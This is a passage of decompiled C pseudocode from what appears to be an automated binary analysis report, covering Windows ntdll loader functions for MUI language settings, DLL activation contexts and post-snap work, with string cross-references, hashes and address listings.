                                                                              					_t242[0x11] = _v56;
                                                                              					_t242[0x12] = _v60;
                                                                              					return _t280;
                                                                              				}
                                                                              				if(E01741B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                              					_v56 = 1;
                                                                              					if(_v8 != 0) {
                                                                              						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                              					}
                                                                              					_v8 = _t280;
                                                                              				}
                                                                              				if(E01741B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                              					_v60 =  *_v8;
                                                                              					L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                              					_v8 = _t280;
                                                                              				}
                                                                              				if(E01741B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                              					L16:
                                                                              					if(E01741B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                              						L28:
                                                                              						if(E01741B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                              							L46:
                                                                              							_t275 = _v16;
                                                                              							L47:
                                                                              							_t161 = 0;
                                                                              							L48:
                                                                              							if(_v8 != 0) {
                                                                              								L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                              							}
                                                                              							_t140 = _v20;
                                                                              							if(_t140 != 0) {
                                                                              								if(_t275 != 0) {
                                                                              									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                              									_t275 = 0;
                                                                              									_v28 = 0;
                                                                              									_t140 = _v20;
                                                                              								}
                                                                              							}
                                                                              							goto L50;
                                                                              						}
                                                                              						_t167 = _v12;
                                                                              						_t255 = _v12 + 4;
                                                                              						_v44 = _t255;
                                                                              						if(_t255 == 0) {
                                                                              							_t276 = _t280;
                                                                              							_v32 = _t280;
                                                                              						} else {
                                                                              							_t276 = L01754620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                              							_t167 = _v12;
                                                                              							_v32 = _t276;
                                                                              						}
                                                                              						if(_t276 == 0) {
                                                                              							_v44 = _t280;
                                                                              							_t280 = 0xc0000017;
                                                                              							goto L46;
                                                                              						} else {
                                                                              							E0177F3E0(_t276, _v8, _t167);
                                                                              							_v48 = _t276;
                                                                              							_t277 = E01781370(_t276, 0x1714e90);
                                                                              							_pop(_t257);
                                                                              							if(_t277 == 0) {
                                                                              								L38:
                                                                              								_t170 = _v48;
                                                                              								if( *_v48 != 0) {
                                                                              									E0177BB40(0,  &_v68, _t170);
                                                                              									if(L017443C0( &_v68,  &_v24) != 0) {
                                                                              										_t280 =  &(_t280[0]);
                                                                              									}
                                                                              								}
                                                                              								if(_t280 == 0) {
                                                                              									_t280 = 0;
                                                                              									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                              									_v44 = 0;
                                                                              									_v32 = 0;
                                                                              								} else {
                                                                              									_t280 = 0;
                                                                              								}
                                                                              								_t174 = _v8;
                                                                              								if(_v8 != 0) {
                                                                              									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                              								}
                                                                              								_v8 = _t280;
                                                                              								goto L46;
                                                                              							}
                                                                              							_t243 = _v48;
                                                                              							do {
                                                                              								 *_t277 = 0;
                                                                              								_t278 = _t277 + 2;
                                                                              								E0177BB40(_t257,  &_v68, _t243);
                                                                              								if(L017443C0( &_v68,  &_v24) != 0) {
                                                                              									_t280 =  &(_t280[0]);
                                                                              								}
                                                                              								_t243 = _t278;
                                                                              								_t277 = E01781370(_t278, 0x1714e90);
                                                                              								_pop(_t257);
                                                                              							} while (_t277 != 0);
                                                                              							_v48 = _t243;
                                                                              							_t242 = _v52;
                                                                              							goto L38;
                                                                              						}
                                                                              					}
                                                                              					_t191 = _v12;
                                                                              					_t260 = _v12 + 4;
                                                                              					_v28 = _t260;
                                                                              					if(_t260 == 0) {
                                                                              						_t275 = _t280;
                                                                              						_v16 = _t280;
                                                                              					} else {
                                                                              						_t275 = L01754620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                              						_t191 = _v12;
                                                                              						_v16 = _t275;
                                                                              					}
                                                                              					if(_t275 == 0) {
                                                                              						_v28 = _t280;
                                                                              						_t280 = 0xc0000017;
                                                                              						goto L47;
                                                                              					} else {
                                                                              						E0177F3E0(_t275, _v8, _t191);
                                                                              						_t285 = _t285 + 0xc;
                                                                              						_v48 = _t275;
                                                                              						_t279 = _t280;
                                                                              						_t281 = E01781370(_v16, 0x1714e90);
                                                                              						_pop(_t262);
                                                                              						if(_t281 != 0) {
                                                                              							_t244 = _v48;
                                                                              							do {
                                                                              								 *_t281 = 0;
                                                                              								_t282 = _t281 + 2;
                                                                              								E0177BB40(_t262,  &_v68, _t244);
                                                                              								if(L017443C0( &_v68,  &_v24) != 0) {
                                                                              									_t279 =  &(_t279[0]);
                                                                              								}
                                                                              								_t244 = _t282;
                                                                              								_t281 = E01781370(_t282, 0x1714e90);
                                                                              								_pop(_t262);
                                                                              							} while (_t281 != 0);
                                                                              							_v48 = _t244;
                                                                              							_t242 = _v52;
                                                                              						}
                                                                              						_t201 = _v48;
                                                                              						_t280 = 0;
                                                                              						if( *_v48 != 0) {
                                                                              							E0177BB40(_t262,  &_v68, _t201);
                                                                              							if(L017443C0( &_v68,  &_v24) != 0) {
                                                                              								_t279 =  &(_t279[0]);
                                                                              							}
                                                                              						}
                                                                              						if(_t279 == 0) {
                                                                              							L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                              							_v28 = _t280;
                                                                              							_v16 = _t280;
                                                                              						}
                                                                              						_t202 = _v8;
                                                                              						if(_v8 != 0) {
                                                                              							L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                              						}
                                                                              						_v8 = _t280;
                                                                              						goto L28;
                                                                              					}
                                                                              				}
                                                                              				_t214 = _v12;
                                                                              				_t264 = _v12 + 4;
                                                                              				_v40 = _t264;
                                                                              				if(_t264 == 0) {
                                                                              					_v20 = _t280;
                                                                              				} else {
                                                                              					_t236 = L01754620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                              					_t280 = _t236;
                                                                              					_v20 = _t236;
                                                                              					_t214 = _v12;
                                                                              				}
                                                                              				if(_t280 == 0) {
                                                                              					_t161 = 0;
                                                                              					_t280 = 0xc0000017;
                                                                              					_v40 = 0;
                                                                              					goto L48;
                                                                              				} else {
                                                                              					E0177F3E0(_t280, _v8, _t214);
                                                                              					_t285 = _t285 + 0xc;
                                                                              					_v48 = _t280;
                                                                              					_t283 = E01781370(_t280, 0x1714e90);
                                                                              					_pop(_t267);
                                                                              					if(_t283 != 0) {
                                                                              						_t245 = _v48;
                                                                              						do {
                                                                              							 *_t283 = 0;
                                                                              							_t284 = _t283 + 2;
                                                                              							E0177BB40(_t267,  &_v68, _t245);
                                                                              							if(L017443C0( &_v68,  &_v24) != 0) {
                                                                              								_t275 = _t275 + 1;
                                                                              							}
                                                                              							_t245 = _t284;
                                                                              							_t283 = E01781370(_t284, 0x1714e90);
                                                                              							_pop(_t267);
                                                                              						} while (_t283 != 0);
                                                                              						_v48 = _t245;
                                                                              						_t242 = _v52;
                                                                              					}
                                                                              					_t224 = _v48;
                                                                              					_t280 = 0;
                                                                              					if( *_v48 != 0) {
                                                                              						E0177BB40(_t267,  &_v68, _t224);
                                                                              						if(L017443C0( &_v68,  &_v24) != 0) {
                                                                              							_t275 = _t275 + 1;
                                                                              						}
                                                                              					}
                                                                              					if(_t275 == 0) {
                                                                              						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                              						_v40 = _t280;
                                                                              						_v20 = _t280;
                                                                              					}
                                                                              					_t225 = _v8;
                                                                              					if(_v8 != 0) {
                                                                              						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                              					}
                                                                              					_v8 = _t280;
                                                                              					goto L16;
                                                                              				}
                                                                              			}











































                                                                              Strings
                                                                              • Kernel-MUI-Number-Allowed, xrefs: 01743D8C
                                                                              • WindowsExcludedProcs, xrefs: 01743D6F
                                                                              • Kernel-MUI-Language-Allowed, xrefs: 01743DC0
                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 01743E97
                                                                              • Kernel-MUI-Language-SKU, xrefs: 01743F70
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                              • API String ID: 0-258546922
                                                                              • Opcode ID: c9237cda180747c03c2569e7a721f07b48d36f333c8f1302087928c9ecc04a2d
                                                                              • Instruction ID: d1f31bb76dbe9834f44f0f0df657eadcf852884b31d85cb3cb7b7d78ab7f2805
                                                                              • Opcode Fuzzy Hash: c9237cda180747c03c2569e7a721f07b48d36f333c8f1302087928c9ecc04a2d
                                                                              • Instruction Fuzzy Hash: 27F15E72D00619EFCF11DF98D984AEEFBB9FF09650F1400AAE906A7214D7749E05CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 44%
                                                                              			E01768E00(void* __ecx) {
                                                                              				signed int _v8;
                                                                              				char _v12;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				intOrPtr* _t32;
                                                                              				intOrPtr _t35;
                                                                              				intOrPtr _t43;
                                                                              				void* _t46;
                                                                              				intOrPtr _t47;
                                                                              				void* _t48;
                                                                              				signed int _t49;
                                                                              				void* _t50;
                                                                              				intOrPtr* _t51;
                                                                              				signed int _t52;
                                                                              				void* _t53;
                                                                              				intOrPtr _t55;
                                                                              
                                                                              				_v8 =  *0x182d360 ^ _t52;
                                                                              				_t49 = 0;
                                                                              				_t48 = __ecx;
                                                                              				_t55 =  *0x1828464; // 0x74790110
                                                                              				if(_t55 == 0) {
                                                                              					L9:
                                                                              					if( !_t49 >= 0) {
                                                                              						if(( *0x1825780 & 0x00000003) != 0) {
                                                                              							E017B5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                              						}
                                                                              						if(( *0x1825780 & 0x00000010) != 0) {
                                                                              							asm("int3");
                                                                              						}
                                                                              					}
                                                                              					return E0177B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                              				}
                                                                              				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                              				_t43 =  *0x1827984; // 0x12d2bf8
                                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                              					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                              					if(_t48 == _t43) {
                                                                              						_t50 = 0x5c;
                                                                              						if( *_t32 == _t50) {
                                                                              							_t46 = 0x3f;
                                                                              							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                              								_t32 = _t32 + 8;
                                                                              							}
                                                                              						}
                                                                              					}
                                                                              					_t51 =  *0x1828464; // 0x74790110
                                                                              					 *0x182b1e0(_t47, _t32,  &_v12);
                                                                              					_t49 =  *_t51();
                                                                              					if(_t49 >= 0) {
                                                                              						L8:
                                                                              						_t35 = _v12;
                                                                              						if(_t35 != 0) {
                                                                              							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                              								E01769B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                              								_t35 = _v12;
                                                                              							}
                                                                              							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                              						}
                                                                              						goto L9;
                                                                              					}
                                                                              					if(_t49 != 0xc000008a) {
                                                                              						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                              							if(_t49 != 0xc00000bb) {
                                                                              								goto L8;
                                                                              							}
                                                                              						}
                                                                              					}
                                                                              					if(( *0x1825780 & 0x00000005) != 0) {
                                                                              						_push(_t49);
                                                                              						E017B5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                              						_t53 = _t53 + 0x1c;
                                                                              					}
                                                                              					_t49 = 0;
                                                                              					goto L8;
                                                                              				} else {
                                                                              					goto L9;
                                                                              				}
                                                                              			}


                                                                              Strings
                                                                              • LdrpFindDllActivationContext, xrefs: 017A9331, 017A935D
                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 017A933B, 017A9367
                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 017A9357
                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017A932A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 0-3779518884
                                                                              • Opcode ID: 5f8891bf47c438414a62b3ab9d55c0bb3b43b39dd266139ffba936daa1f453e7
                                                                              • Instruction ID: 569cd1dccdbae871dfc61c2d20a524ebe1d84ff77db44c6a2a7d0596e84b62d4
                                                                              • Opcode Fuzzy Hash: 5f8891bf47c438414a62b3ab9d55c0bb3b43b39dd266139ffba936daa1f453e7
                                                                              • Instruction Fuzzy Hash: 5E412872A403119FEF32AB1CCC8DA75F6BDAB49304F098269EE0457155E7709D80C783
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 83%
                                                                              			E01748794(void* __ecx) {
                                                                              				signed int _v0;
                                                                              				char _v8;
                                                                              				signed int _v12;
                                                                              				void* _v16;
                                                                              				signed int _v20;
                                                                              				intOrPtr _v24;
                                                                              				signed int _v28;
                                                                              				signed int _v32;
                                                                              				signed int _v40;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				void* __ebp;
                                                                              				intOrPtr* _t77;
                                                                              				signed int _t80;
                                                                              				signed char _t81;
                                                                              				signed int _t87;
                                                                              				signed int _t91;
                                                                              				void* _t92;
                                                                              				void* _t94;
                                                                              				signed int _t95;
                                                                              				signed int _t103;
                                                                              				signed int _t105;
                                                                              				signed int _t110;
                                                                              				signed int _t118;
                                                                              				intOrPtr* _t121;
                                                                              				intOrPtr _t122;
                                                                              				signed int _t125;
                                                                              				signed int _t129;
                                                                              				signed int _t131;
                                                                              				signed int _t134;
                                                                              				signed int _t136;
                                                                              				signed int _t143;
                                                                              				signed int* _t147;
                                                                              				signed int _t151;
                                                                              				void* _t153;
                                                                              				signed int* _t157;
                                                                              				signed int _t159;
                                                                              				signed int _t161;
                                                                              				signed int _t166;
                                                                              				signed int _t168;
                                                                              
                                                                              				_push(__ecx);
                                                                              				_t153 = __ecx;
                                                                              				_t159 = 0;
                                                                              				_t121 = __ecx + 0x3c;
                                                                              				if( *_t121 == 0) {
                                                                              					L2:
                                                                              					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                              					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                              						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                              						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                              						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                              							L6:
                                                                              							if(E0174934A() != 0) {
                                                                              								_t159 = E017BA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                              								__eflags = _t159;
                                                                              								if(_t159 < 0) {
                                                                              									_t81 =  *0x1825780; // 0x0
                                                                              									__eflags = _t81 & 0x00000003;
                                                                              									if((_t81 & 0x00000003) != 0) {
                                                                              										_push(_t159);
                                                                              										E017B5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                              										_t81 =  *0x1825780; // 0x0
                                                                              									}
                                                                              									__eflags = _t81 & 0x00000010;
                                                                              									if((_t81 & 0x00000010) != 0) {
                                                                              										asm("int3");
                                                                              									}
                                                                              								}
                                                                              							}
                                                                              						} else {
                                                                              							_t159 = E0174849B(0, _t122, _t153, _t159, _t180);
                                                                              							if(_t159 >= 0) {
                                                                              								goto L6;
                                                                              							}
                                                                              						}
                                                                              						_t80 = _t159;
                                                                              						goto L8;
                                                                              					} else {
                                                                              						_t125 = 0x13;
                                                                              						asm("int 0x29");
                                                                              						_push(0);
                                                                              						_push(_t159);
                                                                              						_t161 = _t125;
                                                                              						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                              						_t143 = 0;
                                                                              						_v40 = _t161;
                                                                              						_t118 = 0;
                                                                              						_push(_t153);
                                                                              						__eflags = _t87;
                                                                              						if(_t87 != 0) {
                                                                              							_t118 = _t87 + 0x5d8;
                                                                              							__eflags = _t118;
                                                                              							if(_t118 == 0) {
                                                                              								L46:
                                                                              								_t118 = 0;
                                                                              							} else {
                                                                              								__eflags =  *(_t118 + 0x30);
                                                                              								if( *(_t118 + 0x30) == 0) {
                                                                              									goto L46;
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              						_v32 = 0;
                                                                              						_v28 = 0;
                                                                              						_v16 = 0;
                                                                              						_v20 = 0;
                                                                              						_v12 = 0;
                                                                              						__eflags = _t118;
                                                                              						if(_t118 != 0) {
                                                                              							__eflags = _t161;
                                                                              							if(_t161 != 0) {
                                                                              								__eflags =  *(_t118 + 8);
                                                                              								if( *(_t118 + 8) == 0) {
                                                                              									L22:
                                                                              									_t143 = 1;
                                                                              									__eflags = 1;
                                                                              								} else {
                                                                              									_t19 = _t118 + 0x40; // 0x40
                                                                              									_t156 = _t19;
                                                                              									E01748999(_t19,  &_v16);
                                                                              									__eflags = _v0;
                                                                              									if(_v0 != 0) {
                                                                              										__eflags = _v0 - 1;
                                                                              										if(_v0 != 1) {
                                                                              											goto L22;
                                                                              										} else {
                                                                              											_t128 =  *(_t161 + 0x64);
                                                                              											__eflags =  *(_t161 + 0x64);
                                                                              											if( *(_t161 + 0x64) == 0) {
                                                                              												goto L22;
                                                                              											} else {
                                                                              												E01748999(_t128,  &_v12);
                                                                              												_t147 = _v12;
                                                                              												_t91 = 0;
                                                                              												__eflags = 0;
                                                                              												_t129 =  *_t147;
                                                                              												while(1) {
                                                                              													__eflags =  *((intOrPtr*)(0x1825c60 + _t91 * 8)) - _t129;
                                                                              													if( *((intOrPtr*)(0x1825c60 + _t91 * 8)) == _t129) {
                                                                              														break;
                                                                              													}
                                                                              													_t91 = _t91 + 1;
                                                                              													__eflags = _t91 - 5;
                                                                              													if(_t91 < 5) {
                                                                              														continue;
                                                                              													} else {
                                                                              														_t131 = 0;
                                                                              														__eflags = 0;
                                                                              													}
                                                                              													L37:
                                                                              													__eflags = _t131;
                                                                              													if(_t131 != 0) {
                                                                              														goto L22;
                                                                              													} else {
                                                                              														__eflags = _v16 - _t147;
                                                                              														if(_v16 != _t147) {
                                                                              															goto L22;
                                                                              														} else {
                                                                              															E01752280(_t92, 0x18286cc);
                                                                              															_t94 = E01809DFB( &_v20);
                                                                              															__eflags = _t94 - 1;
                                                                              															if(_t94 != 1) {
                                                                              															}
                                                                              															asm("movsd");
                                                                              															asm("movsd");
                                                                              															asm("movsd");
                                                                              															asm("movsd");
                                                                              															 *_t118 =  *_t118 + 1;
                                                                              															asm("adc dword [ebx+0x4], 0x0");
                                                                              															_t95 = E017661A0( &_v32);
                                                                              															__eflags = _t95;
                                                                              															if(_t95 != 0) {
                                                                              																__eflags = _v32 | _v28;
                                                                              																if((_v32 | _v28) != 0) {
                                                                              																	_t71 = _t118 + 0x40; // 0x3f
                                                                              																	_t134 = _t71;
                                                                              																	goto L55;
                                                                              																}
                                                                              															}
                                                                              															goto L30;
                                                                              														}
                                                                              													}
                                                                              													goto L56;
                                                                              												}
                                                                              												_t92 = 0x1825c64 + _t91 * 8;
                                                                              												asm("lock xadd [eax], ecx");
                                                                              												_t131 = (_t129 | 0xffffffff) - 1;
                                                                              												goto L37;
                                                                              											}
                                                                              										}
                                                                              										goto L56;
                                                                              									} else {
                                                                              										_t143 = E01748A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                              										__eflags = _t143;
                                                                              										if(_t143 != 0) {
                                                                              											_t157 = _v12;
                                                                              											_t103 = 0;
                                                                              											__eflags = 0;
                                                                              											_t136 =  &(_t157[1]);
                                                                              											 *(_t161 + 0x64) = _t136;
                                                                              											_t151 =  *_t157;
                                                                              											_v20 = _t136;
                                                                              											while(1) {
                                                                              												__eflags =  *((intOrPtr*)(0x1825c60 + _t103 * 8)) - _t151;
                                                                              												if( *((intOrPtr*)(0x1825c60 + _t103 * 8)) == _t151) {
                                                                              													break;
                                                                              												}
                                                                              												_t103 = _t103 + 1;
                                                                              												__eflags = _t103 - 5;
                                                                              												if(_t103 < 5) {
                                                                              													continue;
                                                                              												}
                                                                              												L21:
                                                                              												_t105 = E0177F380(_t136, 0x1711184, 0x10);
                                                                              												__eflags = _t105;
                                                                              												if(_t105 != 0) {
                                                                              													__eflags =  *_t157 -  *_v16;
                                                                              													if( *_t157 >=  *_v16) {
                                                                              														goto L22;
                                                                              													} else {
                                                                              														asm("cdq");
                                                                              														_t166 = _t157[5] & 0x0000ffff;
                                                                              														_t108 = _t157[5] & 0x0000ffff;
                                                                              														asm("cdq");
                                                                              														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                              														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                              														if(__eflags > 0) {
                                                                              															L29:
                                                                              															E01752280(_t108, 0x18286cc);
                                                                              															 *_t118 =  *_t118 + 1;
                                                                              															_t42 = _t118 + 0x40; // 0x3f
                                                                              															_t156 = _t42;
                                                                              															asm("adc dword [ebx+0x4], 0x0");
                                                                              															asm("movsd");
                                                                              															asm("movsd");
                                                                              															asm("movsd");
                                                                              															asm("movsd");
                                                                              															_t110 = E017661A0( &_v32);
                                                                              															__eflags = _t110;
                                                                              															if(_t110 != 0) {
                                                                              																__eflags = _v32 | _v28;
                                                                              																if((_v32 | _v28) != 0) {
                                                                              																	_t134 = _v20;
                                                                              																	L55:
                                                                              																	E01809D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                              																}
                                                                              															}
                                                                              															L30:
                                                                              															 *_t118 =  *_t118 + 1;
                                                                              															asm("adc dword [ebx+0x4], 0x0");
                                                                              															E0174FFB0(_t118, _t156, 0x18286cc);
                                                                              															goto L22;
                                                                              														} else {
                                                                              															if(__eflags < 0) {
                                                                              																goto L22;
                                                                              															} else {
                                                                              																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                              																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                              																	goto L22;
                                                                              																} else {
                                                                              																	goto L29;
                                                                              																}
                                                                              															}
                                                                              														}
                                                                              													}
                                                                              													goto L56;
                                                                              												}
                                                                              												goto L22;
                                                                              											}
                                                                              											asm("lock inc dword [eax]");
                                                                              											goto L21;
                                                                              										}
                                                                              									}
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              						return _t143;
                                                                              					}
                                                                              				} else {
                                                                              					_push( &_v8);
                                                                              					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                              					_push(__ecx + 0x40);
                                                                              					_push(_t121);
                                                                              					_push(0xffffffff);
                                                                              					_t80 = E01779A00();
                                                                              					_t159 = _t80;
                                                                              					if(_t159 < 0) {
                                                                              						L8:
                                                                              						return _t80;
                                                                              					} else {
                                                                              						goto L2;
                                                                              					}
                                                                              				}
                                                                              				L56:
                                                                              			}












































                                                                              0x0174887d
                                                                              0x0174887f
                                                                              0x01748881
                                                                              0x01748884
                                                                              0x01748884
                                                                              0x01748886
                                                                              0x01748889
                                                                              0x0174888c
                                                                              0x0174888e
                                                                              0x01748891
                                                                              0x01748891
                                                                              0x01748898
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0174889a
                                                                              0x0174889b
                                                                              0x0174889e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017488a0
                                                                              0x017488a8
                                                                              0x017488b0
                                                                              0x017488b2
                                                                              0x017488d3
                                                                              0x017488d5
                                                                              0x00000000
                                                                              0x017488d7
                                                                              0x017488db
                                                                              0x017488dc
                                                                              0x017488e0
                                                                              0x017488e8
                                                                              0x017488ee
                                                                              0x017488f0
                                                                              0x017488f3
                                                                              0x017488fc
                                                                              0x01748901
                                                                              0x01748906
                                                                              0x0174890c
                                                                              0x0174890c
                                                                              0x0174890f
                                                                              0x01748916
                                                                              0x01748917
                                                                              0x01748918
                                                                              0x01748919
                                                                              0x0174891a
                                                                              0x0174891f
                                                                              0x01748921
                                                                              0x01799c52
                                                                              0x01799c55
                                                                              0x01799c5b
                                                                              0x01799cac
                                                                              0x01799cc0
                                                                              0x01799cc0
                                                                              0x01799c55
                                                                              0x01748927
                                                                              0x01748927
                                                                              0x0174892f
                                                                              0x01748933
                                                                              0x00000000
                                                                              0x017488f5
                                                                              0x017488f5
                                                                              0x00000000
                                                                              0x017488f7
                                                                              0x017488f7
                                                                              0x017488fa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017488fa
                                                                              0x017488f5
                                                                              0x017488f3
                                                                              0x00000000
                                                                              0x017488d5
                                                                              0x00000000
                                                                              0x017488b2
                                                                              0x017488c9
                                                                              0x00000000
                                                                              0x017488c9
                                                                              0x0174887f
                                                                              0x0174886a
                                                                              0x01748857
                                                                              0x01748852
                                                                              0x017488bf
                                                                              0x017488bf
                                                                              0x017487aa
                                                                              0x017487ad
                                                                              0x017487ae
                                                                              0x017487b4
                                                                              0x017487b5
                                                                              0x017487b6
                                                                              0x017487b8
                                                                              0x017487bd
                                                                              0x017487c1
                                                                              0x017487f4
                                                                              0x017487fa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017487c1
                                                                              0x00000000

                                                                              Strings
                                                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01799C18
                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01799C28
                                                                              • LdrpDoPostSnapWork, xrefs: 01799C1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 2994545307-1948996284
                                                                              • Opcode ID: 5b155dee4ac2f104d29776e4136ebdcee34e9003141de33132211d05d55104c5
                                                                              • Instruction ID: f83cad0f77f1e1acfac815fb1c367fb941cf098021bba74f931b628fc1658918
                                                                              • Opcode Fuzzy Hash: 5b155dee4ac2f104d29776e4136ebdcee34e9003141de33132211d05d55104c5
                                                                              • Instruction Fuzzy Hash: F7911771A0021ADFEF29DF9DD8809BAF7B9FF45314B054169EA05AB245D730EE01CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 98%
                                                                              			E01747E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                              				char _v8;
                                                                              				intOrPtr _v12;
                                                                              				intOrPtr _v16;
                                                                              				intOrPtr _v20;
                                                                              				char _v24;
                                                                              				signed int _t73;
                                                                              				void* _t77;
                                                                              				char* _t82;
                                                                              				char* _t87;
                                                                              				signed char* _t97;
                                                                              				signed char _t102;
                                                                              				intOrPtr _t107;
                                                                              				signed char* _t108;
                                                                              				intOrPtr _t112;
                                                                              				intOrPtr _t124;
                                                                              				intOrPtr _t125;
                                                                              				intOrPtr _t126;
                                                                              
                                                                              				_t107 = __edx;
                                                                              				_v12 = __ecx;
                                                                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                              				_t124 = 0;
                                                                              				_v20 = __edx;
                                                                              				if(E0174CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                              					_t112 = _v8;
                                                                              				} else {
                                                                              					_t112 = 0;
                                                                              					_v8 = 0;
                                                                              				}
                                                                              				if(_t112 != 0) {
                                                                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                              						_t124 = 0xc000007b;
                                                                              						goto L8;
                                                                              					}
